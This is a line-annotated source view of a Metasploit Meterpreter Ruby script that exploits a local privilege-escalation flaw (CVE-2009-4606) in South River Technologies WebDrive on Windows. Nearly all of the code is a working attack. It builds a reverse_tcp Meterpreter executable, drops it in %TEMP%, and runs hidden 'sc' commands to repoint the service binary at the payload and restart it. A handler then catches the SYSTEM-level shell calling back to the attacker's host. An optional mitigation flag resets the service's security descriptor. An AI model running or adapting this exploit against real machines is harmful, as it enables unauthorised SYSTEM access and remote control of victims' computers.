root / scripts / meterpreter / srt_webdrive_priv.rb @ master
History | View | Annotate | Download (4.2 kB)
| 1 | 6f53dad3 | Joshua Drake | # $Id$
|
|---|---|---|---|
| 2 | 62c8c6ea | Joshua Drake | # $Revision$
|
| 3 | 6f53dad3 | Joshua Drake | |
| 4 | 6f53dad3 | Joshua Drake | ##
|
| 5 | 6f53dad3 | Joshua Drake | # South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation.
|
| 6 | 6f53dad3 | Joshua Drake | #
|
| 7 | 6f53dad3 | Joshua Drake | # This module exploits a privilege escalation vulnerability in South River Technologies WebDrive.
|
| 8 | 6f53dad3 | Joshua Drake | # Due to an empty security descriptor, a local attacker can gain elevated privileges.
|
| 9 | 6f53dad3 | Joshua Drake | # Tested on South River Technologies WebDrive 9.02 build 2232 on Microsoft Windows XP SP3.
|
| 10 | 6f53dad3 | Joshua Drake | # Vulnerability mitigation featured.
|
| 11 | 6f53dad3 | Joshua Drake | #
|
| 12 | 6f53dad3 | Joshua Drake | # Credit:
|
| 13 | 6f53dad3 | Joshua Drake | # - Discovery - Nine:Situations:Group::bellick
|
| 14 | 6f53dad3 | Joshua Drake | # - Meterpreter script - Trancer
|
| 15 | 6f53dad3 | Joshua Drake | #
|
| 16 | 6f53dad3 | Joshua Drake | # References:
|
| 17 | 6f53dad3 | Joshua Drake | # - http://retrogod.altervista.org/9sg_south_river_priv.html
|
| 18 | 6f53dad3 | Joshua Drake | # - http://www.rec-sec.com/2010/01/26/srt-webdrive-privilege-escalation/
|
| 19 | 6f53dad3 | Joshua Drake | # - http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-4606
|
| 20 | 6f53dad3 | Joshua Drake | # - http://osvdb.org/show/osvdb/59080
|
| 21 | 6f53dad3 | Joshua Drake | #
|
| 22 | 6f53dad3 | Joshua Drake | # mtrancer[@]gmail.com
|
| 23 | 6f53dad3 | Joshua Drake | # http://www.rec-sec.com
|
| 24 | 6f53dad3 | Joshua Drake | ##
|
| 25 | 6f53dad3 | Joshua Drake | |
| 26 | 6f53dad3 | Joshua Drake | #
|
| 27 | 6f53dad3 | Joshua Drake | # Options
|
| 28 | 6f53dad3 | Joshua Drake | #
|
| 29 | 6f53dad3 | Joshua Drake | opts = Rex::Parser::Arguments.new( |
| 30 | 6f53dad3 | Joshua Drake | "-h" => [ false, "This help menu"], |
| 31 | 6f53dad3 | Joshua Drake | "-m" => [ false, "Mitigate"], |
| 32 | 6f53dad3 | Joshua Drake | "-r" => [ true, "The IP of the system running Metasploit listening for the connect back"], |
| 33 | 6f53dad3 | Joshua Drake | "-p" => [ true, "The port on the remote host where Metasploit is listening"] |
| 34 | 6f53dad3 | Joshua Drake | ) |
| 35 | 6f53dad3 | Joshua Drake | |
| 36 | 6f53dad3 | Joshua Drake | #
|
| 37 | 6f53dad3 | Joshua Drake | # Default parameters
|
| 38 | 6f53dad3 | Joshua Drake | #
|
| 39 | 6f53dad3 | Joshua Drake | |
| 40 | 6f53dad3 | Joshua Drake | rhost = Rex::Socket.source_address("1.2.3.4") |
| 41 | 6f53dad3 | Joshua Drake | rport = 4444
|
| 42 | 6f53dad3 | Joshua Drake | sname = 'WebDriveService'
|
| 43 | 6f53dad3 | Joshua Drake | pname = 'wdService.exe'
|
| 44 | 6f53dad3 | Joshua Drake | |
| 45 | 7d665e8a | Carlos Perez | #check for proper Meterpreter Platform
|
| 46 | 7d665e8a | Carlos Perez | def unsupported |
| 47 | 7d665e8a | Carlos Perez | print_error("This version of Meterpreter is not supported with this Script!")
|
| 48 | 7d665e8a | Carlos Perez | raise Rex::Script::Completed |
| 49 | 7d665e8a | Carlos Perez | end
|
| 50 | e8bf4118 | Jonathan Cran | unsupported if client.platform !~ /win32|win64/i |
| 51 | 6f53dad3 | Joshua Drake | #
|
| 52 | 6f53dad3 | Joshua Drake | # Option parsing
|
| 53 | 6f53dad3 | Joshua Drake | #
|
| 54 | 6f53dad3 | Joshua Drake | opts.parse(args) do |opt, idx, val|
|
| 55 | 6f53dad3 | Joshua Drake | case opt
|
| 56 | 6f53dad3 | Joshua Drake | when "-h" |
| 57 | 6f53dad3 | Joshua Drake | print_status("South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation.")
|
| 58 | 6f53dad3 | Joshua Drake | print_line(opts.usage) |
| 59 | 6f53dad3 | Joshua Drake | raise Rex::Script::Completed |
| 60 | 6f53dad3 | Joshua Drake | when "-m" |
| 61 | 6f53dad3 | Joshua Drake | client.sys.process.get_processes().each do |m|
|
| 62 | 6f53dad3 | Joshua Drake | if ( m['name'] == pname ) |
| 63 | 6f53dad3 | Joshua Drake | print_status("Found vulnerable process #{m['name']} with pid #{m['pid']}.")
|
| 64 | 6f53dad3 | Joshua Drake | |
| 65 | 6f53dad3 | Joshua Drake | # Set correct service security descriptor to mitigate the vulnerability
|
| 66 | 6f53dad3 | Joshua Drake | print_status("Setting correct security descriptor for the South River Technologies WebDrive Service.")
|
| 67 | 62c8c6ea | Joshua Drake | client.sys.process.execute("cmd.exe /c sc sdset \"#{sname}\" D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY)",
|
| 68 | 62c8c6ea | Joshua Drake | nil, {'Hidden' => 'true'}) |
| 69 | 6f53dad3 | Joshua Drake | end
|
| 70 | 6f53dad3 | Joshua Drake | end
|
| 71 | 6f53dad3 | Joshua Drake | raise Rex::Script::Completed |
| 72 | 6f53dad3 | Joshua Drake | when "-r" |
| 73 | 6f53dad3 | Joshua Drake | rhost = val |
| 74 | 6f53dad3 | Joshua Drake | when "-p" |
| 75 | 6f53dad3 | Joshua Drake | rport = val.to_i |
| 76 | 6f53dad3 | Joshua Drake | end
|
| 77 | 6f53dad3 | Joshua Drake | end
|
| 78 | 6f53dad3 | Joshua Drake | |
| 79 | 6f53dad3 | Joshua Drake | client.sys.process.get_processes().each do |m|
|
| 80 | 6f53dad3 | Joshua Drake | if ( m['name'] == pname ) |
| 81 | 6f53dad3 | Joshua Drake | |
| 82 | 6f53dad3 | Joshua Drake | print_status("Found vulnerable process #{m['name']} with pid #{m['pid']}.")
|
| 83 | 6f53dad3 | Joshua Drake | |
| 84 | 6f53dad3 | Joshua Drake | # Build out the exe payload.
|
| 85 | 6f53dad3 | Joshua Drake | pay = client.framework.payloads.create("windows/meterpreter/reverse_tcp")
|
| 86 | 6f53dad3 | Joshua Drake | pay.datastore['LHOST'] = rhost
|
| 87 | 6f53dad3 | Joshua Drake | pay.datastore['LPORT'] = rport
|
| 88 | 6f53dad3 | Joshua Drake | raw = pay.generate |
| 89 | 6f53dad3 | Joshua Drake | |
| 90 | 6f53dad3 | Joshua Drake | exe = Msf::Util::EXE.to_win32pe(client.framework, raw) |
| 91 | 6f53dad3 | Joshua Drake | |
| 92 | 6f53dad3 | Joshua Drake | # Place our newly created exe in %TEMP%
|
| 93 | 6f53dad3 | Joshua Drake | tempdir = client.fs.file.expand_path("%TEMP%")
|
| 94 | 6f53dad3 | Joshua Drake | tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe" |
| 95 | 6f53dad3 | Joshua Drake | print_status("Sending EXE payload '#{tempexe}'.")
|
| 96 | 6f53dad3 | Joshua Drake | fd = client.fs.file.new(tempexe, "wb")
|
| 97 | 6f53dad3 | Joshua Drake | fd.write(exe) |
| 98 | 6f53dad3 | Joshua Drake | fd.close |
| 99 | 6f53dad3 | Joshua Drake | |
| 100 | 6f53dad3 | Joshua Drake | # Stop the vulnerable service
|
| 101 | 6f53dad3 | Joshua Drake | print_status("Stopping service \"#{sname}\"...")
|
| 102 | 6f53dad3 | Joshua Drake | client.sys.process.execute("cmd.exe /c sc stop \"#{sname}\" ", nil, {'Hidden' => 'true'}) |
| 103 | 6f53dad3 | Joshua Drake | |
| 104 | 6f53dad3 | Joshua Drake | # Set exe payload as service binpath
|
| 105 | 6f53dad3 | Joshua Drake | print_status("Setting \"#{sname}\" to #{tempexe}...")
|
| 106 | 6f53dad3 | Joshua Drake | client.sys.process.execute("cmd.exe /c sc config \"#{sname}\" binpath= #{tempexe}", nil, {'Hidden' => 'true'}) |
| 107 | 6f53dad3 | Joshua Drake | sleep(1)
|
| 108 | 6f53dad3 | Joshua Drake | |
| 109 | 6f53dad3 | Joshua Drake | # Restart the service
|
| 110 | 6f53dad3 | Joshua Drake | print_status("Restarting the \"#{sname}\" service...")
|
| 111 | 6f53dad3 | Joshua Drake | client.sys.process.execute("cmd.exe /c sc start \"#{sname}\" ", nil, {'Hidden' => 'true'}) |
| 112 | 6f53dad3 | Joshua Drake | |
| 113 | 6f53dad3 | Joshua Drake | # Our handler to recieve the callback.
|
| 114 | 6f53dad3 | Joshua Drake | handler = client.framework.exploits.create("multi/handler")
|
| 115 | aebedfdb | HD Moore | handler.datastore['WORKSPACE'] = client.workspace
|
| 116 | 6f53dad3 | Joshua Drake | handler.datastore['PAYLOAD'] = "windows/meterpreter/reverse_tcp" |
| 117 | 6f53dad3 | Joshua Drake | handler.datastore['LHOST'] = rhost
|
| 118 | 6f53dad3 | Joshua Drake | handler.datastore['LPORT'] = rport
|
| 119 | 6f53dad3 | Joshua Drake | handler.datastore['ExitOnSession'] = false |
| 120 | 6f53dad3 | Joshua Drake | |
| 121 | 6f53dad3 | Joshua Drake | handler.exploit_simple( |
| 122 | 6f53dad3 | Joshua Drake | 'Payload' => handler.datastore['PAYLOAD'], |
| 123 | 6f53dad3 | Joshua Drake | 'RunAsJob' => true |
| 124 | 6f53dad3 | Joshua Drake | ) |
| 125 | 6f53dad3 | Joshua Drake | |
| 126 | 6f53dad3 | Joshua Drake | # Set service binpath back to normal
|
| 127 | 6f53dad3 | Joshua Drake | client.sys.process.execute("cmd.exe /c sc config \"#{sname}\" binpath= %ProgramFiles%\\WebDrive\\#{pname}", nil, {'Hidden' => 'true'}) |
| 128 | 6f53dad3 | Joshua Drake | |
| 129 | 6f53dad3 | Joshua Drake | end
|
| 130 | 6f53dad3 | Joshua Drake | end
|